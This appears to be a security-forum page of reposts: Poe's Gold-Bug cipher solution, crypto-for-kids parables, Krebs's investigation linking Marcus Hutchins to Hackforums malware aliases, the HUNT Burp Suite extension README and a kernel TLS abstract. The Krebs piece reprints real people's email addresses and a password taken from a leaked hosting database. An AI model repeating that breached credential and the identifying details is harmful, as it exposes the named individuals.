assumed the cryptograph to be English. "You observe there are no divisions between the words. Had there been divisions, the task would have been comparatively easy. In such case I should have commenced with a collation and analysis of the shorter words, and, had a word of a single letter occurred, as is most likely, (a or I, for example,) I should have considered the solution as assured. But, there being no division, my first step was to ascertain the predominant letters, as well as the least frequent. Counting all, I constructed a table, thus: Of the character 8 there are 33. ; " 26. 4 " 19. + ) " 16. * " 13. 5 " 12. 6 " 11. ! 1 " 8. 0 " 6. 9 2 " 5. : 3 " 4. ? " 3. ` " 2. - . " 1. "Now, in English, the letter which most frequently occurs is e. Afterwards, the succession runs thus: a o i d h n r s t u y c f g l m w b k p q x z. E however predominates so remarkably that an individual sentence of any length is rarely seen, in which it is not the prevailing character. "Here, then, we have, in the very beginning, the groundwork for something more than a mere guess. The general use which may be made of the table is obvious --but, in this particular cipher, we shall only very partially require its aid. As our predominant character is 8, we will commence by assuming it as the e of the natural alphabet. To verify the supposition, let us observe if the 8 be seen often in couples --for e is doubled with great frequency in English --in such words, for example, as 'meet,' 'fleet,' 'speed, 'seen,' 'been,' 'agree,' &c. In the present instance we see it doubled less than five times, although the cryptograph is brief. "Let us assume 8, then, as e. Now, of all words in the language, 'the' is the most usual; let us see, therefore, whether they are not repetitions of any three characters in the same order of collocation, the last of them being 8. If we discover repetitions of such letters, so arranged, they will most probably represent the word 'the.' On inspection, we find no less than seven such arrangements, the characters being ;48. We may, therefore, assume that the semicolon represents t, that 4 represents h, and that 8 represents e --the last being now well confirmed. Thus a great step has been taken. "But, having established a single word, we are enabled to establish a vastly important point; that is to say, several commencements and terminations of other words. Let us refer, for example, to the last instance but one, in which the combination ;48 occurs --not far from the end of the cipher. We know that the semicolon immediately ensuing is the commencement of a word, and, of the six characters succeeding this 'the,' we are cognizant of no less than five. Let us set these characters down, thus, by the letters we know them to represent, leaving a space for the unknown-- t eeth. "Here we are enabled, at once, to discard the 'th,' as forming no portion of the word commencing with the first t; since, by experiment of the entire alphabet for a letter adapted to the vacancy we perceive that no word can be formed of which this th can be a part. We are thus narrowed into t ee, and, going through the alphabet, if necessary, as before, we arrive at the word 'tree,' as the sole possible reading. We thus gain another letter, r, represented by (, with the words 'the tree' in juxtaposition. "Looking beyond these words, for a short distance, we again see the combination ;48, and employ it by way of termination to what immediately precedes. We have thus this arrangement: the tree ;4(+?34 the, or substituting the natural letters, where known, it reads thus: the tree thr+?3h the. "Now, if, in place of the unknown characters, we leave blank spaces, or substitute dots, we read thus: the tree thr...h the, when the word 'through' makes itself evident at once. But this discovery gives us three new letters, o, u and g, represented by + ? and 3. "Looking now, narrowly, through the cipher for combinations of known characters, we find, not very far from the beginning, this arrangement, 83(88, or egree, which, plainly, is the conclusion of the word 'degree,' and gives us another letter, d, represented by !. "Four letters beyond the word 'degree,' we perceive the combination 46(;88*. "Translating the known characters, and representing the unknown by dots, as before, we read thus: th.rtee. an arrangement immediately suggestive of the word 'thirteen,' and again furnishing us with two new characters, i and n, represented by 6 and *. "Referring, now, to the beginning of the cryptograph, we find the combination, 53++!. "Translating, as before, we obtain .good, which assures us that the first letter is A, and that the first two words are 'A good.' "To avoid confusion, it is now time that we arrange our key, as far as discovered, in a tabular form. It will stand thus: 5 represents a ! " d 8 " e 3 " g 4 " h 6 " i * " n + " o ( " r ; " t "We have, therefore, no less than ten of the most important letters represented, and it will be unnecessary to proceed with the details of the solution. I have said enough to convince you that ciphers of this nature are readily soluble, and to give you some insight into the rationale of their development. But be assured that the specimen before us appertains to the very simplest species of cryptograph. It now only remains to give you the full translation of the characters upon the parchment, as unriddled. Here it is: 'A good glass in the bishop's hostel in the devil's seat twenty-one degrees and thirteen minutes northeast and by north main branch seventh limb east side shoot from the left eye of the death's-head a bee line from the tree through the shot fifty feet out.'" "But," said I, "the enigma seems still in as bad a condition as ever. How is it possible to extort a meaning from all this jargon about 'devil's seats,' 'death's-heads,' and 'bishop's hostel'?" "I confess," replied Legrand, "that the matter still wears a serious aspect, when regarded with a casual glance. My first endeavor was to divide the sentence into the natural division intended by the cryptographist." "You mean, to punctuate it?" "Something of that kind." "But how was it possible to effect this?" "I reflected that it had been a point with the writer to run his words together without division, so as to increase the difficulty of solution. Now, a not overacute man, in pursuing such an object, would be nearly certain to overdo the matter. When, in the course of his composition, he arrived at a break in his subject which would naturally require a pause, or a point, he would be exceedingly apt to run his characters, at this place, more than usually close together. If you will observe the MS., in the present instance, you will easily detect five such cases of unusual crowding. Acting on this hint, I made the division thus: 'A good glass in the bishop's hostel in the devil's --twenty-one degrees and thirteen minutes --northeast and by north --main branch seventh limb east side --shoot from the left eye of the death's-head --a bee-line from the tree through the shot fifty feet out.'" "Even this division," said I, "leaves me still in the dark." 32. A portal suddenly opened on the starboard ejecting a fleet of imperial pursuit vessels. The propulsion system of my ship got hit before the shield activated. I’ve tried to switch on the backup drive but before it charged to 5% I was already dangling off a dozen tractor beams. It wasn’t much of a fight. They’ve just came and picked me up as one would pick up a box of frozen strawberries in a supermarket. I must have passed out because of pressure loss because the next thing I remember is being in a plain white room with my hands cuffed behind my back. There was a sound of door opening and a person walked into my field of vision. It took me few seconds to realize who the man was. He was wearing an old-fashioned black suit and a bowler hat, black umbrella in his hand, not the baggy trousers seen on his official portraits. But then he smiled and showed the glistening golden teeth on the left side and his own healthy camel-like teeth on the right and the realization hit me. It was him. Beylerbey Qgdzzxoglu in person. “Peace be upon you,” he said. Then he sat down on the other side of a little coffee table, made himself comfortable and put his umbrella on the floor. “We have a little matter to discuss, you and I,” he said. He took a paper out of his pocket and put in on the coffee table, spinning it so that I can read it. “Attack the Phlesmus Pashalik,” said one line. “Attack the Iconium Cluster,” said the line below it. The rest of the sheet was empty except for holographic seal of High Command of Proximian Insurgency. "Comandante Ribeira is no fool," he said, "And this scrap of paper is not going to convince me that he's going to split his forces and attack both those places at the same time. Our strategic machines are vastly more powerful than Proximian ones, they've been running hot for the past week and out lab rats tell us that there's no way to win that way." "You are right, O leader of men," I said. I knew that this kind of empty flattery was used at the Sublime Porte but I was not sure whether it wasn't reserved for the sultan alone. Qgdzzxoglu smiled snarkily but haven't said anything. Maybe I was going to live in the end. "I have no loyalty for the Proximian cause and before the rebelion I have lived happily and had no thoughts of betrayal. And now, hoping for your mercy, I am going to disclose the true meaning of this message to you." "It is a code, O you, whose slipper weights heavily upon the neck of nations," I said, "The recepient is supposed to ignore the first sentence and only follow the second one." I hoped I haven't overdone it. Being honest with the enemy is hard. "So you are trying to convince me that de Ribeira is going to attack Iconium," he gave me a sharp look, apparently trying to determine whether I was lying or not. "And you know what? We've got our reports. And our reports are saying that rebels will try to trick us into moving all our forces into Iconium and then attack pashalik of Phlesmus while it's undefended. And if that's what you are trying to do bad things are going to happen to your proboscis." "The Most Holy Cross, John XXIII and Our Lady of Africa have already got a command to move to Iconium cluster. And you should expect at least comparable fire force from elsewhere." ... The messenger has no intention to suffer to win someone else's war. At the same time it's clear that if he continues to tell truth he will be tortured. So he says that general is right and it's the first sentence that should be taken into account. The general begins to feel a bit uneasy at this point. He has two contradictory confessions and it's not at all clear which one is correct. He orders the torture to proceed only to make the messager change his confession once again. ... “Today, the God, the Compassionate, the Merciful have taught me that there are secrets that cannot be given away. You cannot give them away to save yourself from torture. You cannot give them away to save your kids from being sold to slavery. You cannot give them away to prevent the end of the world. You just cannot give them away and whether you want to or not matters little.” 54. Here's a simple game for kids that shows how asymmetric encryption works in principle, makes the fact that with only public key at your disposal encryption may be easy while decryption may be so hard as to be basically impossible, intuitive and gives everyone a hands-on experience with a simple asymmetric encryption system. Here's how it works: Buy a dictionary of some exotic language. The language being exotic makes it improbable that any of the kids involved in the game would understand it. Also, it makes cheating by using Google Translate impossible. Let's say you've opted for Eskimo language. The story of the game can be located at the North Pole after all. You should prefer a dictionary that comes in two bands: English-Eskimo dictionary and Eskimo-English dictionary. The former will play the role of public key and the latter the role of secret key. Obviously, if there's no two-band dictionary available, you'll have to cut a single-band one in two. To distribute the public key to everyone involved in the game you can either buy multiple copies of English-Eskimo dictionary, which may be expensive, or you can simply place a single copy at a well-known location. In school library, at a local mom-and-pop shop or at a secret place known only to the game participants. If a kid wants to send an encrypted message to the owner of the secret key, they just use the public key (English-Eskimo dictionary) to translate the message, word-by-word, from English to Eskimo. The owner of the secret key (Eskimo-English dictionary) can then easily decrypt the message by translating it back into English. However, if the message gets intercepted by any other game participant, decrypting it would be an extremely time consuming activity. Each word of the message would have to be found in English-Eskimo dictionary, which would in turn mean scanning the whole dictionary in a page-by-page and word-by-word manner! 78. It's a puppet show. There are two hills on the stage with country border between them. Law-abiding citizen is on the right hill. Smuggler enters the stage on the left. SMUGGLER: Hey, you! CITIZEN: Who? Me? SMUGGLER: Do you like booze? CITIZEN: Sure I do. And who are you? SMUGGLER: I'm the person who will sell you some booze. CITIZEN: What about cigarettes? SMUGGLERS: Sure thing. Cheap Ukrainian variety for $1 a pack. Also Slovenian Mariboro brand. CITIZEN: Thanks God! I am getting sick of our government trying to make me healthy! Border patrol emerges from a bush in the middle of the stage. PATROL: Forget about it, guys! This is a state border. Nothing's gonna pass one way or the other. You better pack your stuff and go home. SMUGGLER: Ignore him. We'll meet later on at some other place, without border patrol around, and you'll get all the booze and cigarettes you want. PATROL: Ha! I would like to see that. Both of you are going to end up in jail. CITIZEN: He's right. If you tell me where to meet, he's going to hear that, go there and arrest us. ... Smuggler has a list of possible places to meet: Big oak at 57th mile of the border. Lower end of Abe Smith's pasture. ... ... He obfuscates each entry and shout them to the citizen in no particular order. Citizen chooses one of the puzzles and de-obfuscates it. It takes him 10 minutes. The de-obfuscates message reads: "18. Behind the old brick factory." CITIZEN (cries): Eighteen! SMUGGLER: Ok, got it, let's meet there in an hour! PATROL: Oh my, oh my. I am much better at de-obfuscation than that moron citizen. I've already got two messages solved. But one has number 56, the other number 110. I have no idea which one is going to be number 18. There's no way I can find the right one in just one hour! The curtain comes down. Happy gulping sounds can be heard from the backstage. 99. Mr. X is approached in the subway by a guy who claims to be an alien stranded on Earth and to possess time machine that allows him to know the future. He needs funds to fix his flying saucer but filling in winning numbers for next week's lottery would create a time paradox. Therefore, he's willing to sell next week's winning numbers to Mr. X at a favourable price. Mr. X, as gullible as he is, feels that this may be a scam and asks for a proof. Alien gives him the next week's winning numbers in encrypted form so that Mr. X can't use them and then decide not to pay for them. After the lottery draw he'll give Mr. X the key to unlock the file and Mr. X can verify that the prediction was correct. After the draw, Mr. X gets the key and lo and behold, the numbers are correct! To rule out the possibility that it happened by chance, they do the experiment twice. Then thrice. Finally, Mr. X is persuaded. He pays the alien and gets the set of numbers for the next week's draw. But the numbers drawn are completely different. And now the question: How did the scam work? NOTE: The claim about the time paradox is super weak. To improve the story the alien can ask for something non-monetary (sex, political influence). Or, more generally, positive demonstration of knowledge of the future can be used to make people do what you want. E.g. "I know that an asteroid is going to destroy Earth in one year. Give me all your money to build a starship to save you." Sursa: https://sustrik.github.io/crypto-for-kids/
      • 1
      • Upvote
  7. 05 Sep 17 Who Is Marcus Hutchins? In early August 2017, FBI agents in Las Vegas arrested 23-year-old British security researcher Marcus Hutchins on suspicion of authoring and/or selling “Kronos,” a strain of malware designed to steal online banking credentials. Hutchins was virtually unknown to most in the security community until May 2017 when the U.K. media revealed him as the “accidental hero” who inadvertently halted the global spread of WannaCry, a ransomware contagion that had taken the world by storm just days before. Relatively few knew it before his arrest, but Hutchins has for many years authored the popular cybersecurity blog MalwareTech. When this fact became more widely known — combined with his hero status for halting Wannacry — a great many MalwareTech readers quickly leapt to his defense to denounce his arrest. They reasoned that the government’s case was built on flimsy and scant evidence, noting that Hutchins has worked tirelessly to expose cybercriminals and their malicious tools. To date, some 226 supporters have donated more than $14,000 to his defense fund. Marcus Hutchins, just after he was revealed as the security expert who stopped the WannaCry worm. Image: twitter.com/malwaretechblog At first, I did not believe the charges against Hutchins would hold up under scrutiny. But as I began to dig deeper into the history tied to dozens of hacker forum pseudonyms, email addresses and domains he apparently used over the past decade, a very different picture began to emerge. In this post, I will attempt to describe and illustrate more than three weeks’ worth of connecting the dots from what appear to be Hutchins’ earliest hacker forum accounts to his real-life identity. The clues suggest that Hutchins began developing and selling malware in his mid-teens — only to later develop a change of heart and earnestly endeavor to leave that part of his life squarely in the rearview mirror. GH0STHOSTING/IARKEY I began this investigation with a simple search of domain name registration records at domaintools.com [full disclosure: Domain Tools recently was an advertiser on this site]. A search for “Marcus Hutchins” turned up a half dozen domains registered to a U.K. resident by the same name who supplied the email address “surfallday2day@hotmail.co.uk.” One of those domains — Gh0sthosting[dot]com (the third character in that domain is a zero) — corresponds to a hosting service that was advertised and sold circa 2009-2010 on Hackforums[dot]net, a massively popular forum overrun with young, impressionable men who desperately wish to be elite coders or hackers (or at least recognized as such by their peers). The surfallday2day@hotmail.co.uk address tied to Gh0sthosting’s initial domain registration records also was used to register a Skype account named Iarkey that listed its alias as “Marcus.” A Twitter account registered in 2009 under the nickname “Iarkey” points to Gh0sthosting[dot]com. Gh0sthosting was sold by a Hackforums user who used the same Iarkey nickname, and in 2009 Iarkey told fellow Hackforums users in a sales thread for his business that Gh0sthosting was “mainly for blackhats wanting to phish.” In a separate post just a few days apart from that sales thread, Iarkey responds that he is “only 15” years old, and in another he confirms that his email address is surfallday2day@hotmail.co.uk. A review of the historic reputation tied to the Gh0sthosting domain suggests that at least some customers took Iarkey up on his offer: Malwaredomainlist.com, for example, shows that around this same time in 2009 Gh0sthosting was observed hosting plenty of malware, including trojan horse programs, phishing pages and malware exploits. A “reverse WHOIS” search at Domaintools.com shows that Iarkey’s surfallday2day email address was used initially to register several other domains, including uploadwith[dot]us and thecodebases[dot]com. Shortly after registering Gh0sthosting and other domains tied to his surfallday2day@hotmail.co.uk address, Iarkey evidently thought better of including his real name and email address in his domain name registration records. Thecodebases[dot]com, for example, changed its WHOIS ownership to a “James Green” in the U.K., and switched the email to “herpderpderp2@hotmail.co.uk.” A reverse WHOIS lookup at domaintools.com for that email address shows it was used to register a Hackforums parody (or phishing?) site called Heckforums[dot]net. The domain records showed this address was tied to a Hackforums clique called “Atthackers.” The records also listed a Michael Chanata from Florida as the owner. We’ll come back to Michael Chanata and Atthackers at the end of this post. DA LOSER/FLIPERTYJOPKINS As early as 2009, Iarkey was outed several times on Hackforums as being Marcus Hutchins from the United Kingdom. In most of those instances he makes no effort to deny the association — and in a handful of posts he laments that fellow members felt the need to “dox” him by posting his real address and name in the hacking forum for all to see. Iarkey, like many other extremely active Hackforums users, changed his nickname on the forum constantly, and two of his early nicknames on Hackforums around 2009 were “Flipertyjopkins” and “Da Loser“. Hackforums user “Da Loser” is doxed by another member. Happily, Hackforums has a useful feature that allows anyone willing to take the time to dig through a user’s postings to learn when and if that user was previously tied to another account. This is especially evident in multi-page Hackforums discussion threads that span many days or weeks: If a user changes his nickname during that time, the forum is set up so that it includes the user’s most previous nickname in any replies that quote the original nickname — ostensibly so that users can follow along with who’s who and who said what to whom. In the screen shot below, for instance, we can see one of Hutchins’ earliest accounts — Da Loser — being quoted under his Flipertyjopkins nickname. A screen shot showing Hackforums’ tendency to note when users switch between different usernames. Both the Da Loser and Flipertyjopkins identities on Hackforums referenced the same domains in 2009 as theirs — Gh0sthosting — as well as another domain called “hackblack.co[dot]uk.” Da Loser references the hackblack domain as the place where other Hackforums users can download “the sourcecode of my IE/MSN messenger password stealer (aka M_Stealer).” In another post, Da Loser brags about how his password stealing program goes undetected by multiple antivirus scanners, pointing to a (now deleted) screenshot at a Photobucket account for a “flipertyjopkins”: Another screenshot from Da Loser’s postings in June 2009 shows him advertising the Hackblack domain and the Surfallday2day@hotmail.co.uk address: Hackforums user “Da Loser” advertises his “Hackblack” hosting and points to the surfallday2day email address. An Internet search for this Hackblack domain reveals a thread on the Web hosting forum MyBB started by a user Flipertyjopkins, who asks other members for help configuring his site, which he lists as http://hackblack.freehost10[dot]com. A user named Flipertyjopkins asks for help for his domain, hackblack.freehost10[dot]com. Poking around the Web for these nicknames and domains turned up a Youtube user account named Flipertyjopkins that includes several videos uploaded 7-8 years ago that instruct viewers on how to use various types of password-stealing malware. In one of the videos — titled “Hotmail cracker v1.3” — Flipertyjopkins narrates how to use a piece of malware by the same name to steal passwords from unsuspecting victims. Approximately two minutes and 48 seconds into the video, we can briefly see an MSN Messenger chat window shown behind the Microsoft Notepad application he is using to narrate the video. The video clearly shows that the MSN Messenger client is logged in to with the address “hutchins22@hotmail.com.” The email address “hutchins22@hotmail.com” can be seen briefly in the background of this video. To close out the discussion of Flipertyjopkins, I should note that this email address showed up multiple times in the database leak from Hostinger.co.uk, a British Web hosting company that got hacked in 2015. A copy of that database can be found in several places online, and it shows that one Hostinger customer named Marcus used an account under the email address flipertyjopkins@gmail.com. According to the leaked user database, the password for that account — “emmy009” — also was used to register two other accounts at Hostinger, including the usernames “hacker” (email address: flipertyjopkins@googlemail.com) and “flipertyjopkins” (email: surfallday2day@hotmail.co.uk). ELEMENT PRODUCTS/GONE WITH THE WIND Most of the activities and actions that can be attributed to Iarkey/Flipertyjopkins/Da Loser et. al on Hackforums are fairly small-time — and hardly rise to the level of coding from scratch a complex banking trojan and selling it to cybercriminals. However, multiple threads on Hackforums state that Hutchins around 2011-2012 switched to two new nicknames that corresponded to users who were far more heavily involved in coding and selling complex malicious software: “Element Products,” and later, “Gone With The Wind.” Hackforums’ nickname preservation feature leaves little doubt that the user Element Products at some point in 2012 changed his nickname to Gone With the Wind. However, for almost a week I could not see any signs of a connection between these two accounts and the ones previously and obviously associated with Hutchins (Flipertyjopkins, Iarkey, etc.). In the meantime, I endeavored to find out as much as possible about Element Products — a suite of software and services including a keystroke logger, a “stresser” or online attack service, as well as a “no-distribute” malware scanner. Unlike legitimate scanning services such as Virustotal — which scan malicious software against dozens of antivirus tools and then share the output with all participating antivirus companies — no-distribute scanners are made and marketed to malware authors who wish to see how broadly their malware is detected without tipping off the antivirus firms to a new, more stealthy version of the code. Indeed, Element Scanner — which was sold in subscription packages starting at $40 per month — scanned all customer malware with some 37 different antivirus tools. But according to posts from Gone With the Wind, the scanner merely resold the services of scan4you[dot]net, a multiscanner that was extremely powerful and popular for several years across a variety of underground cybercrime forums. According to a story at Bleepingcomputer.com, scan4you disappeared in July 2017, around the same time that two Latvian men were arrested for running an unnamed no-distribute scanner. [Side note: Element Scanner was later incorporated as the default scanning application of “Blackshades,” a remote access trojan that was extremely popular on Hackforums for several years until its developers and dozens of customers were arrested in an international law enforcement sting in May 2014. Incidentally, as the story linked in the previous sentence explains, the administrator and owner of Hackforums would play an integral role in setting up many of his forum’s users for the Blackshades sting operation.] According to one thread on Hackforums, Element Products was sold in 2012 to another Hackforums user named “Dal33t.” This was the nickname used by Ammar Zuberi, a young man from Dubai who — according to this this January 2017 KrebsOnSecurity story — may have been associated with a group of miscreants on Hackforums that specialized in using botnets to take high-profile Web sites offline. Zuberi could not be immediately reached for comment. I soon discovered that Element Products was by far the least harmful product that this user sold on Hackforums. In a separate thread in 2012, Element Products announces the availability of a new product he had for sale — dubbed the “Ares Form Grabber” — a program that could be used to surreptitiously steal usernames and passwords from victims. Element Products/Gone With The Wind also advertised himself on Hackforums as an authorized reseller of the infamous exploit kit known as “Blackhole.” Exploit kits are programs made to be stitched into hacked and malicious Web sites so that when visitors browse to the site with outdated and insecure browser plugins the browser is automatically infected with whatever malware the attacker wishes to foist on the victim. In addition, Element Products ran a “bot shop,” in which he sold access to bots claimed to have enslaved through his own personal use of Blackhole: Gone With The Wind’s “Bot Shop,” which sold access to computers hacked with the help of the Blackhole exploit kit. A bit more digging showed that the Element Products user on Hackforums co-sold his wares along with another Hackforums user named “Kill4Joy,” who advertised his contact address as kill4joy@live.com. Ironically, Hackforums was itself hacked in 2012, and a leaked copy of the user database from that hack shows this Kill4Joy user initially registered on the forum in 2011 with the email address rohang93@live.com. A reverse WHOIS search at domaintools.com shows that email address was used to register several domain names, including contegoprint.info. The registration records for that domain show that it was registered by a Rohan Gupta from Illinois. I learned that Gupta is now attending graduate school at the University of Illinois at Urbana-Champaign, where he is studying computer engineering. Reached via telephone, Gupta confirmed that he worked with the Hackforums user Element Products six years ago, but said he only handled sales for the Element Scanner product, which he says was completely legal. “I was associated with Element Scanner which was non-malicious,” Gupta said. “It wasn’t black hat, and I wasn’t associated with the programming, I just assisted with the sales.” Gupta said his partner and developer of the software went by the name Michael Chanata and communicated with him via a Skype account registered to the email address atthackers@hotmail.com. Recall that we heard at the beginning of this story that the name Michael Chanata was tied to Heckforums.net, a domain closely connected to the Iarkey nickname on Hackforums. Curious to see if this Michael Chanata character showed up somewhere on Hackforums, I used the forum’s search function to find out. The following screenshot from a July 2011 Hackforums thread suggests that Michael Chanata was yet another nickname used by Da Loser, a Hackforums account associated with Marcus Hutchins’ early email addresses and Web sites. Hackforums shows that the user “Da Loser” at the same time used the nickname “Michael Chanata.” BV1/ORGY Interesting connections, to be sure, but I wasn’t satisfied with this finding and wanted more conclusive evidence of the supposed link. So I turned to “passive DNS” tools from Farsight Security — which keeps a historic record of which domain names map to which IP addresses. Using Farsight’s tools, I found that Element Scanner’s various Web sites (elementscanner[dot]com/net/su/ru) were at one point hosted at the Internet address 184.168.88.189 alongside just a handful of other interesting domains, including bigkeshhosting[dot]com and bvnetworks[dot]com. At first, I didn’t fully recognize the nicknames buried in each of these domains, but a few minutes of searching on Hackforums reminded me that bigkeshhosting[dot]com was a project run by a Hackforums user named “Orgy.” I originally wrote about Orgy — whose real name is Robert George Danielson — in a 2012 story about a pair of stresser or “booter” (DDoS-for-hire) sites. As noted in that piece, Danielson has had several brushes with the law, including a guilty plea for stealing multiple firearms from the home of a local police chief. I also learned that the bvnetworks[dot]com domain belonged to Orgy’s good friend and associate on Hackforums — a user who for many years went by the nickname “BV1.” In real life, BV1 is 27-year-old Brendan Johnston, a California man who went to prison in 2014 for his role in selling the Blackshades trojan. When I discovered the connection to BV1, I searched my inbox for anything related to this nickname. Lo and behold, I found an anonymous tip I’d received through KrebsOnSecurity.com’s contact form in March 2013 which informed me of BV1’s real identity and said he was close friends with Orgy and the Hackforums user Iarkey. According to this anonymous informant, Iarkey was an administrator of an Internet relay chat (IRC) forum that BV1 and Orgy frequented called irc.voidptr.cz. “You already know that Orgy is running a new booter, but BV1 claims to have ‘left’ the hacking business because all the information on his family/himself has been leaked on the internet, but that is a lie,” the anonymous tipster wrote. “If you connect to http://irc.voidptr. cz ran by ‘touchme’ aka ‘iarkey’ from hackforums you can usually find both BV1 and Orgy in there.” TOUCHME/TOUCH MY MALWARE/MAYBE TOUCHME Until recently, I was unfamiliar with the nickname TouchMe. Naturally, I started digging into Hackforums again. An exhaustive search on the forum shows that TouchMe — and later “Touch Me Maybe” and “Touch My Malware” — were yet other nicknames for the same account. In a Hackforums post from July 2012, the user Touch Me Maybe pointed to a writeup that he claimed to have authored on his own Web site: touchmymalware.blogspot.com: The Hackforums user “Touch Me Maybe” seems to refer to his own blog and malware analysis at touchmymalware.blogspot.com, which now redirects to Marcus Hutchins’ blog — Malwaretech.com If you visit this domain name now, it redirects to Malwaretech.com, which is the same blog that Hutchins was updating for years until his arrest in August. There are other facts to support a connection between MalwareTech and the IRC forum voidptr.cz: A passive DNS scan for irc.voidptr.cz at Farsight Security shows that at one time the IRC channel was hosted at the Internet address 52.86.95.180 — where it shared space with just one other domain: irc.malwaretech.com. All of the connections explained in this blog post — and some that weren’t — can be seen in the following mind map that I created with the excellent MindNode Pro for Mac. A mind map I created to keep track of the myriad data points mentioned in this story. Click the image to enlarge. Following Hutchins’ arrest, multiple Hackforums members posted what they suspected about his various presences on the forum. In one post from October 2011, Hackforums founder and administrator Jesse “Omniscient” LaBrocca said Iarkey had hundreds of accounts on Hackforums. In one of the longest threads on Hackforums about Hutchins’ arrest there are several postings from a user named “Previously Known As” who self-identifies in that post and multiple related threads as BV1. In one such post, dated Aug. 7, 2017, BV1 observes that Hutchins failed to successfully separate his online selves from his real life identity. Brendan “BV1” Johnston says he worried his old friend’s operational security mistakes would one day catch up with him. “He definitely thought he separated TouchMe/MWT from iarkey/Element,” said BV1. “People warned him, myself included, that people can still connect MWT to iarkey, but he never seemed to care too much. He has so many accounts on HF at this point, I doubt someone will be able to connect all the dots. It sucks that some of the worst accounts have been traced back to him already. He ran a hosting company and a Minecraft server with Orgy and I.” In a brief interview with KrebsOnSecurity, Brendan “BV1” Johnston said Hutchins was a good friend. Johnston said Hutchins had — like many others who later segued into jobs in the information security industry — initially dabbled in the dark side. But Johnston said his old friend sincerely tried to turn things around in late 2012 — when Gone With the Wind sold most of his coding projects to other Hackforums members and began focusing on blogging about poorly-written malware. “I feel like I know Marcus better than most people do online, and when I heard about the accusations I was completely shocked,” Johnston said. “He tried for such a long time to steer me down a straight and narrow path that seeing this tied to him didn’t make sense to me at all.” Let me be clear: I have no information to support the claim that Hutchins authored or sold the Kronos banking trojan. According to the government, Hutchins did so in 2014 on the Dark Web marketplace AlphaBay — which was taken down in July 2017 as part of a coordinated, global law enforcement raid on AlphaBay sellers and buyers alike. However, the findings in this report suggest that for several years Hutchins enjoyed a fairly successful stint coding malicious software for others, said Nicholas Weaver, a security researcher at the International Computer Science Institute and a lecturer at UC Berkeley. “It appears like Mr. Hutchins had a significant and prosperous blackhat career that he at least mostly gave up in 2013,” Weaver said. “Which might have been forgotten if it wasn’t for the involuntary British press coverage on WannaCry raising his profile and making him out as a ‘hero’.” Weaver continued: “I can easily imagine the Feds taking the opportunity to use a penny-ante charge against a known ‘bad guy’ when they can’t charge for more significant crimes,” he said. “But the Feds would have done far less collateral damage if they actually provided a criminal complaint with these sorts of detail rather than a perfunctory indictment.” Hutchins did not try to hide the fact that he has written and published unique malware strains, which in the United States at least is a form of protected speech. In December 2014, for example, Hutchins posted to his Github page the source code to TinyXPB, malware he claims to have written that is designed to seize control of a computer so that the malware loads before the operating system can even boot up. While the publicly available documents related to his case are light on details, it seems clear that prosecutors can make a case against those who attempt to sell malware to cybercriminals — such as on hacker forums like AlphaBay — if they can demonstrate the accused had knowledge and intent that the malware would be used to commit a crime. The Justice Department’s indictment against Hutchins suggests that the prosecution is relying heavily on the word of an unnamed co-conspirator who became a confidential informant for the government. Update, 9:08 a.m.: Several readers on Twitter disagreed with the previous statement, noting that U.S. prosecutors have said the other unnamed suspect in the Hutchins indictment is still at large. Original story: According to a story at BankInfoSecurity, the evidence submitted by prosecutors for the government includes: Statements made by Hutchins after he was arrested. A CD containing two audio recordings from a county jail in Nevada where he was detained by the FBI. 150 pages of Jabber chats between the defendant and an individual. Business records from Apple, Google and Yahoo. Statements (350 pages) by the defendant from another internet forum, which were seized by the government in another district. Three to four samples of malware. A search warrant executed on a third party, which may contain some privileged information. Hutchins declined to comment for this story, citing his ongoing prosecution. He has pleaded not guilty to all four counts against him, including conspiracy to distribute malicious software with the intent to cause damage to 10 or more affected computers without authorization, and conspiracy to distribute malware designed to intercept protected electronic communications. FBI officials have not yet responded to requests for comment. Sursa: https://krebsonsecurity.com/2017/09/who-is-marcus-hutchins/
  8. Super POC: http://m.blog.csdn.net/caiqiiqi/article/details/77861477
  9. S-a lucrat mult pe partea de customer service & support in ultima perioada.
  10. Daca intri cu IP de Germania, probabil nu e nicio limita.
  11. HUNT Burp Suite Extension HUNT is a Burp Suite extension to: Identify common parameters vulnerable to certain vulnerability classes. Organize testing methodologies inside of Burp Suite. HUNT Scanner (hunt_scanner.py) This extension does not test these parameters but rather alerts on them so that a bug hunter can test them manually (thoroughly). For each class of vulnerability, Bugcrowd has identified common parameters or functions associated with that vulnerability class. We also provide curated resources in the issue description to do thorough manual testing of these vulnerability classes. HUNT Methodology (hunt_methodology.py) This extension allows testers to send requests and responses to a Burp tab called "HUNT Methodology". This tab contains a tree on the left side that is a visual representation of your testing methodology. By sending request/responses here testers can organize or attest to having done manual testing in that section of the application or having completed a certain methodology step. Getting Started with HUNT First ensure you have the latest standalone Jython JAR set up under "Extender" -> "Options". Add HUNT via "Extender" -> "Extensions". HUNT Scanner will begin to run across traffic that flows through the proxy. Important to note, HUNT Scanner leverages the passive scanning API. Here are the conditions under which passive scan checks are run: First request of an active scan Proxy requests Any time "Do a passive scan" is selected from the context menu Passive scans are not run on the following: On every active scan response On Repeater responses On Intruder responses On Sequencer responses On Spider responses Instead, the standard workflow would be to set your scope, run Burp Spider from Target tab, then right-click "Passively scan selected items". HUNT Scanner Vulnerability Classes SQL Injection Local/Remote File Inclusion & Path Traversal Server Side Request Forgery & Open Redirect OS Command Injection Insecure Direct Object Reference Server Side Template Injection Logic & Debug Parameters Cross Site Scripting External Entity Injection Malicious File Upload TODO Change regex for parameter names to include user_id instead of just id Search in scanner window Highlight param in scanner window Implement script name checking, REST URL support, JSON & XML post-body params. Support normal convention of Request tab: Raw, Params, Headers, Hex sub-tabs inside scanner Add more methodology JSON files: Web Application Hacker's Handbook PCI HIPAA CREST OWASP Top Ten OWASP Application Security Verification Standard Penetration Testing Execution Standard Burp Suite Methodology Add more text for advisory in scanner window Add more descriptions and resources in methodology window Add functionality to send request/response to other Burp tabs like Repeater Authors JP Villanueva Jason Haddix Ryan Black Fatih Egbatan Vishal Shah License Licensed with the Apache 2.0 License here Sursa: https://github.com/bugcrowd/HUNT
      • 3
      • Upvote
      • Thanks
  12. 1 st Dave Watson Facebook San Francisco, USA dave jwatson - fb.com Abstract Transport Layer Security (TLS) is a widely-deployed protocol used for securing TCP connections on the Internet. TLS is also a required feature for HTTP/2, the latest web standard. In kernel implementations provide new opportunities for optimization of TLS. This paper explores a possible kernel TLS implementation, as well as the kernel features it enables, such as sendfile(), BPF programs, and hardware TLS offload. Our implementation saves up to 7% CPU copy overhead and up to 10% latency improvements when combined with the Kernel Connection Multiplexor (KCM). Download: https://netdevconf.org/1.2/papers/ktls.pdf
      • 1
      • Upvote
